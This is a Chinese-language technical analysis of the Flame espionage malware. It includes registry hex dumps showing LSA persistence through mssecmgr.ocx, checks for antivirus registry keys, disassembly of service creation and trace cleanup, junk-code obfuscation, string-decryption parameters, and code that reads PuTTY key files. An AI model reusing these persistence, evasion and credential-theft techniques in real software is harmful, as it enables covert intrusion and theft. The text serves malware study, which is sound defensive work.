00000006000000203E4429E354CD01| >D)鉚?HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11鍵值：類型:REG_BINARY長度：56(0x38)字節(jié)s000000:3600310000000000C8400A0F1000666C|6.1菮 fl000010:616D6500220003000400EFBEDC40EF1C|ame." ?000020:DC40181D1400000066006C0061006D00|蹳 000030:6500000014000000 |eHKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\0鍵值：類型:REG_BINARY長度：78(0x4e)字節(jié)s000000:4C00310000000000C740EA3910006D73|L.1茾?..ms000010:7365636D67722E6F6378000030000300|secmgr.ocx..0...000020:0400EFBEDC40F51CDC40091D14000000|..錁蹳?蹳000030:6D0073007300650063006D0067007200|m.s.s.e.c.m.g.r.000040:2E006F006300780000001C000000 |..o.c.xHKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\0\HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\0\0鍵值：類型：REG_BINARY長度：54(0x36)字節(jié)s000000:3400350000000000DC40CB1B1000D853|4.5蹳?..豐000010:CD79310000001E0003000400EFBEDC40|蛓1 錁蹳000020:F61CDC40081D14000000D853CD793100|?蹳 豐蛓1.000030:000016000000 |HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\0\0\HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\0\0\MRUListEx鍵值：類型：REG_BINARY長：4(0x4)字節(jié)sFFFFFFFF |HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\0\0\NodeSlot鍵值：DWORD:96(0x60)HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\0\MRUListEx鍵值：類:REG_BINARY長:8(0x8)字節(jié)s00000000FFFFFFFF HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\0\NodeSlot鍵值：DWORD:95(0x5f)HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\MRUListEx鍵值：類:REG_BINARY長:8(0x8)字節(jié)s00000000FFFFFFFF |HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\11\NodeSlot鍵值：DWORD:94(0x5e)HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\94\HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\94\Shell\HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\94\Shell\Address鍵值：DWORD:4294967295(0xffffffff)HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\94\Shell\Buttons鍵值：DWORD:4294967295(0xffffffff)HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\94\Shell\Col鍵值：DWORD:4294967295(0xffffffff)HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\94\Shell\ColInfo鍵值：類型:REG_BINARY長度:112(0x70)字節(jié)s000000:00000000000000000000000000000000|000010:FDDFDFFD0F0004002000100028003C00| ...(.<000020:00000000010000000200000003000000|000030:B4006000780078000000000001000000|?`.x.x更多...開機啟動：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\AuthenticationPackages新：類型:REG_MULTI_SZ長度:21(0x15)字節(jié)s6D7376315F30006D737365636D67722E|msv1_0.mssecmgr.6F63780000 |ocx..舊：類型:REG_MULTI_SZ長度:8(0x8)字節(jié)s6D7376315F300000 |msv1_0..HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction\LcnEndLocation新：字符串:"10675834"舊：字符串:"0"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction\LcnStartLocation新：字符串:"10485101"舊：字符串:"0"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction\OptimizeComplete:":"No"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction\OptimizeError新：字符串:""舊：字符串:"MissingRegistryEntries"HKLM\Software\Microsoft\InternetExplorer\LowRegistryHKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\OptionHKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformationHKLM\SOFTWARE\Symantec\NortonAntiVirusHKLM\SOFTWARE\Symantec\InstalledAppsHKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\WinlogonHKLM\Software\Microsoft\Windows\CurrentVersion\InternetSettingsHKLM\SOFTWARE\KasperskyLabHKLM\SOFTWARE\Symantec\SymSetup\InternetsecurityHKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserlistHKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ProfileListHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemHKLM\SOFTWARE\Symantec\SymantecAntiVirusHKLM\SYSTEM\CurrentControlSet\Control\LsaHKLM\SYSTEM\CurrentControlSet\Services\Tcpip\ParametersHKIU\Software\Microsoft\Windows\CurrentVersion\Explorer\AdvancedHKLM\Software\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Capture\%s\propertiesFlame”Pageant”Pageant為Putty器時輸入密碼Pageant發(fā)現(xiàn)Flamemov [ebp+StartupInfo.cb],44hmov eax,lpszDesktopmov [ebp+StartupInfo.lpDesktop],eax;setdesktopmov [ebp+CommandLine],blmov esi,104hpush esipush ebxlea eax,[ebp+VersionInformation]push eax ;pVersionInformationcall 0x101A1130add esp,0Chpush esi ;nSizelea eax,[ebp+CommandLine]push eax ;"%ProgramFiles%\InternetExplorer\iexplore.exe"push environment_stringscall ExpandEnvironmentStringsAcmp eax,ebxjz 0x100E3157cmp eax,esija 0x100E3157lea eax,[ebp+ProcessInformation]push eax ;lpProcessInformationlea eax,[ebp+StartupInfo]push eax ;lpStartupInfopush ebx ;lpCurrentDirectorypush ebx ;lpEnvironmentpush 4 ;dwCreationFlagspush ebx ;bInheritHandlespush ebx ;lpThreadAttributespush ebx ;lpProcessAttributeslea eax,[ebp+CommandLine]push eax ;lpCommandLinepush ebx ;lpApplicationNamecall ds:CreateProcessA分析中發(fā)現(xiàn)大量SQL語句，這些語句是操作SQLite數(shù)據(jù)庫中的相關(guān)數(shù)據(jù)。SELECT'INSERTINTOvacuum_db.'||quote(name)||'SELECT*FROMmain.'||quote(name)||';'FROMmain.sqlite_masterWHEREtype='table'ANDname!='sqlite_sequence'ANDrootpage>0UPDATE%sSETGrade=(SELECT%d/%d.0*(rowid-1)FROMstWHEREst.ProdID=%s.ProdID);ELECT'DELETEFROMvacuum_db.'||quote(name)||';'FROMvacuum_db.sqlite_masterWHEREname='sqlite_sequence'INSERTORREPLACEINTOConfiguration(Name,App,Value)VALUES('%s','%s','%s');INSERTORIGNOREINTO%s(Name,App,Value)Values('STORAGE_LENGTH','%s',0);UPDATEsqlite_masterSETsql=sqlite_rename_parent(sql,%Q,%Q)WHERE%s;INSERTINTO%Q.%sVALUES('index',%Q,%Q,#%d,%Q);UPDATE%sSETValue=Value-old.BufferSizeWHEREName='STORAGE_SIZE'ANDApp='%s';UPDATE%sSETValue=Value+1WHEREName='STORAGE_LENGTH'ANDApp='%s';SELECT'INSERTINTOvacuum_db.'||quote(name)||'SELECT*FROMmain.'||quote(name)||';'FROMvacuum_db.sqlite_masterWHEREname=='sqlite_sequence';UPDATE%sSETValue=Value-1WHEREName='STORAGE_LENGTH'ANDApp='%s';UPDATE%sSETValue=Value+new.BufferSizeWHEREName='STORAGE_SIZE'ANDApp='%s';UPDATEsqlite_temp_masterSETsql=sqlite_rename_trigger(sql,%Q),tbl_name=%QWHERE%s;UPDATE%Q.%sSETsql=CASEWHENtype='trigger'THENsqlite_rename_trigger(sql,%Q)ELSEsqlite_rename_table(sql,%Q)END,tbl_name=%Q,name=CASEWHENtype='table'THEN%QWHENnameLIKE'sqlite_autoindex%%'ANDtype='index'THEN'sqlite_autoindex_'||%Q||substr(name,%d+18)ELSEnameENDWHEREtbl_name=%QAND(type='table'ORtype='index'ORtype='trigger');INSERTORIGNOREINTO%s(Name,App,Value)Values('STORAGE_SIZE','%s',0);WQLWQL的全稱是WMIQueryLanguage，簡稱為WQL，Windows管理規(guī)范查詢語言。root\CIMV2select*fromWin32_LogicalDiskSELECT

FROM InstanceOperationEvent WITHIN %d WHERE

ISA'Win32_LogicalDisk'selectProcessID,NamefromWin32_Process創(chuàng)建以下命名管道\\.\pipe\navssvcs\\.\pipe\PipeGx16\\.\\pipe\spoolss分析過程中發(fā)現(xiàn)一些函數(shù)存在類似加花的指令,這些指令并不影響程序的任何功能,如下紅色部分代碼。push ebpmov ebp,esppush ebxpush esipush edimov eax,eaxpush ebxpush eaxpop eaxpop pushapopamov esi,[ebp+8]Flame在單獨的線程修改權(quán)限，打開并創(chuàng)建服務(wù)，加載運行Rdcvlt32.exe程序。pushedi;lpPasswordpushedi;lpServiceStartNamepushedi;lpDependenciespushedi;lpdwTagIdpushedi;lpLoadOrderGrouppushPathName;lpBinaryPathName=;"%windir%\system32\rdcvlt32.exe"push edi ;dwErrorControlpush 3 ;dwStartTypepush 10h ;dwServiceTypepush 0F01FFh ;dwDesiredAccesspushDisplayName;lpDisplayNamepushServiceName;lpServiceNamepusheax;hSCManagercallCreateServiceAcmpeax,edi并且在創(chuàng)建完服務(wù)后直接將其啟動，并刪除服務(wù),清理掉注冊表相關(guān)痕跡。mov eax,[ebx+4]mov byteptr[eax+6],1call start_servicemov [ebp-1],almov eax,edicall delete_servicecmp al,1jnz 0x1011BCD9各個模塊的加密部分存在很大的相通相同處。采用的算法主要是通過如下方式：圖3-5加密算法各個文件采取的算法參數(shù)和算式如下：FilenameParamaParambParamcMMssecmgr.ocx0xBh0xBh+0xCh[0x10376F70h]M=(0xBh+n)*(0xBh+0xCh+n)+[0x101376F70h]FilenameParamaParambParamcMMsglu32.ocx0xBh0xBh+0xCh[0x101863ECh]M=(0xBh+n)*(0xBh+0xCh+n)+[0x101863ECh]Advnetcfg.ocx0x1Ah0x5h0M==(0xAh+n)*(0x5h+n)Nteps32.ocx0x1Ah0x5h0M==(0xAh+n)*(0x5h+n)Soapr32.ocx0x11h0xBh0M==(0x11h+n)*(0xbh+n)Noname.dll0x11h0xBh0M==(0x11h+n)*(0xbh+n)Jimmy.dll0xBh0xBh+0x6h0x58hM=(0xbh+N)*(N+0xbh+0x6h)+0x58hComspol32.ocx0xBh0xBh+0x6h0M=(0xbh+N)*(N+0xbh+0x6h)Browse32.ocx0xBh0xBh+0xch0M=(0xbh+N)*(N+0xbh+0xch)發(fā)現(xiàn)Flame讀取PUTTY創(chuàng)建Key的臨時文件內(nèi)容，可能為破解通訊密鑰。%DocumentsandSettings%\Administrator\PUTTY.RNDlea eax,putty_file_path[eax]push eax ;lpBufferpush offsetstr_HOMEPATH;decode:"HOMEPATH"call my_decode_strA;decode:"HOMEPATH"pop ecxpush eax ;lpNamecall edi;GetEnvironmentVariableAtest eax,eaxjnz short0x10073E35push esi ;uSizepush ebx ;lpBuffercall ds:GetWindowsDirectoryApush ebx ;c1call 0x101A1370pop ecxmov esi,eaxjmp short0x10073E3Badd [ebp+var_4],eaxmov esi,[ebp+var_4]push offsetstr_PUTTY_RND;datacall my_decode_strA;decode:"\PUTTY.RND"push eaxlea eax,putty_file_path[esi]push eaxcall 0x101A1270;catpathpushebx;hTemplateFilepushebx;dwFlagsAndAttributespush3;dwCreationDispositionpushebx;lpSecurityAttributespush3;dwShareModepush80000000h;dwDesir